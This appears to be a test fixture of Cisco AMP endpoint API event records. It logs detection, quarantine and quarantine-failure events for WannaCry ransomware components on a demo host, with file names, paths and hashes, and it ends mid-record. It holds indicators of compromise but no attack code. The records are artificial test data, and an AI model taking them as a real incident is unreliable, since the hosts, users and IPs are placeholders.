-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 